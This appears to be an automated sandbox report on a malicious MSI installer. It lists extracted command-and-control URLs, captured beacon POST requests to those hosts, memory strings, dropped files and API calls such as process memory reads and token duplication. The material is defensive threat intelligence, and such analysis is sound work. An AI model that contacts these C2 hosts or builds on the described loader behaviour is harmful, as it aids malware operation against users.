Windows Analysis Report
ad.msi

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor	URLs: https://wrankaget.site/live/

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 184Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 184Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 184Cache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000026387CF8D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

6_2_0000026387CF8D90

Source: global traffic

DNS traffic detected: DNS query: jarinamaers.shop

Source: unknown

HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache

Source: rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr	String found in binary or memory: ftp://ftp%2desktop.ini
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: rundll32.exe	String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr	String found in binary or memory: http://dr.f.360.cn/scanlist
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: rundll32.exe	String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe	String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr	String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe	String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://t2.symcb.com0
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://tl.symcd.com0&
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/.b
Source: rundll32.exe, 00000007.00000003.3230609342.0000020959EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959EE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/d
Source: rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/fb
Source: rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/06
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/5
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/I
Source: rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/IP
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/RYPT32.dll.mui3N
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/ace
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/r
Source: rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/zTEum
Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/rRb&u
Source: rundll32.exe, 00000007.00000003.3230609342.0000020959EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959EE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/x
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.6:49723 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: 360total.dll.2.dr	Static PE information: section name: yhDm^
Source: Update_71a2ec86.dll.6.dr	Static PE information: section name: yhDm^

Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B33C20 GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetLastError,FreeLibrary,	5_2_00B33C20
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF7B40 NtFreeVirtualMemory,	6_2_0000026387CF7B40
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF7A54 NtWriteFile,	6_2_0000026387CF7A54
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF79C8 NtClose,	6_2_0000026387CF79C8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF78C0 NtReadFile,	6_2_0000026387CF78C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF378C NtClose,	6_2_0000026387CF378C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF77B0 RtlInitUnicodeString,NtCreateFile,	6_2_0000026387CF77B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CFAD34 NtAllocateVirtualMemory,	6_2_0000026387CFAD34
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	6_2_0000026387CF463C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF7588 RtlInitUnicodeString,NtCreateFile,NtClose,	6_2_0000026387CF7588
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CFB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	6_2_0000026387CFB1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CFB0C4 NtOpenKey,RtlpNtOpenKey,	6_2_0000026387CFB0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF7ACC NtClose,	6_2_0000026387CF7ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF7704 NtQueryInformationFile,	6_2_0000026387CF7704
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF7694 RtlInitUnicodeString,NtDeleteFile,	6_2_0000026387CF7694
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CFCB54 NtDelayExecution,	6_2_0000026387CFCB54
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387D00AF0 NtWriteFile,	6_2_0000026387D00AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387D00A90 NtDeleteFile,GetVolumeInformationW,	6_2_0000026387D00A90
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387D00AC0 NtFreeVirtualMemory,GetVolumeInformationW,	6_2_0000026387D00AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387D00A78 NtClose,	6_2_0000026387D00A78
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF745C RtlInitUnicodeString,NtOpenFile,NtClose,	6_2_0000026387CF745C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B82B0C4 NtOpenKey,RtlpNtOpenKey,	7_2_000002095B82B0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B82463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	7_2_000002095B82463C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B82378C NtClose,	7_2_000002095B82378C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B8277B0 RtlInitUnicodeString,NtCreateFile,	7_2_000002095B8277B0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B82B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	7_2_000002095B82B1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B82AD34 NtAllocateVirtualMemory,	7_2_000002095B82AD34
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B827B40 NtFreeVirtualMemory,	7_2_000002095B827B40
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B82CB54 NtDelayExecution,	7_2_000002095B82CB54
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B830A78 NtClose,	7_2_000002095B830A78
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B830A90 NtDeleteFile,GetVolumeInformationW,	7_2_000002095B830A90
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B827694 RtlInitUnicodeString,NtDeleteFile,	7_2_000002095B827694
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B830AC0 NtFreeVirtualMemory,GetVolumeInformationW,	7_2_000002095B830AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B8278C0 NtReadFile,	7_2_000002095B8278C0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B827ACC NtClose,	7_2_000002095B827ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B827A54 NtWriteFile,	7_2_000002095B827A54
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B82745C RtlInitUnicodeString,NtOpenFile,NtClose,	7_2_000002095B82745C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B827588 RtlInitUnicodeString,NtCreateFile,NtClose,	7_2_000002095B827588
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B8279C8 NtClose,	7_2_000002095B8279C8
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B827704 NtQueryInformationFile,	7_2_000002095B827704
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6DAD34 NtAllocateVirtualMemory,	8_2_000002268D6DAD34
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D7B40 NtFreeVirtualMemory,	8_2_000002268D6D7B40
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D7ACC NtClose,	8_2_000002268D6D7ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6DB0C4 NtOpenKey,	8_2_000002268D6DB0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6E0AC0 NtFreeVirtualMemory,CreateToolhelp32Snapshot,	8_2_000002268D6E0AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D78C0 NtReadFile,	8_2_000002268D6D78C0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D7694 RtlInitUnicodeString,NtDeleteFile,	8_2_000002268D6D7694
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6DCB54 NtDelayExecution,	8_2_000002268D6DCB54
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D7704 NtQueryInformationFile,	8_2_000002268D6D7704
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6DB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	8_2_000002268D6DB1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D79C8 NtClose,	8_2_000002268D6D79C8
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D77B0 RtlInitUnicodeString,NtCreateFile,	8_2_000002268D6D77B0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D378C NtClose,	8_2_000002268D6D378C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D7588 RtlInitUnicodeString,NtCreateFile,NtClose,	8_2_000002268D6D7588
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D7A54 NtWriteFile,	8_2_000002268D6D7A54
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D745C RtlInitUnicodeString,NtOpenFile,NtClose,	8_2_000002268D6D745C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,	8_2_000002268D6D463C

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018006A2C8: DeviceIoControl,

6_2_000000018006A2C8

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,

6_2_000000018004B1A4

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\62b2e8.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIB539.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIB5A8.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{B135729E-0574-44D1-B7A1-6E44550F506B}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIB616.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIB6D3.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIB539.tmp

Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B36A50	5_2_00B36A50
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B6F032	5_2_00B6F032
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B692A9	5_2_00B692A9
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B5C2CA	5_2_00B5C2CA
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B5E270	5_2_00B5E270
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B684BD	5_2_00B684BD
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B5A587	5_2_00B5A587
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B6D8D5	5_2_00B6D8D5
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B3C870	5_2_00B3C870
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B54920	5_2_00B54920
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B5A915	5_2_00B5A915
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B60A48	5_2_00B60A48
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B39CC0	5_2_00B39CC0
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B65D6D	5_2_00B65D6D
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180017FE8	6_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006DFF4	6_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800220D8	6_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007C140	6_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180060174	6_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018008023C	6_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000834C	6_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006C470	6_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800784E0	6_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800764F0	6_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180060578	6_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010580	6_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004E5DC	6_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180062600	6_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180002610	6_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180004638	6_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004A650	6_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006E760	6_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800647B0	6_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007E7C7	6_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180076930	6_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180062954	6_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006A994	6_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006E9FC	6_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180082A18	6_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180072A27	6_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010B58	6_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180026C84	6_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001ECF4	6_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180008E20	6_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180052FD8	6_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018003AFE8	6_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005D014	6_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006F0B4	6_2_000000018006F0B4
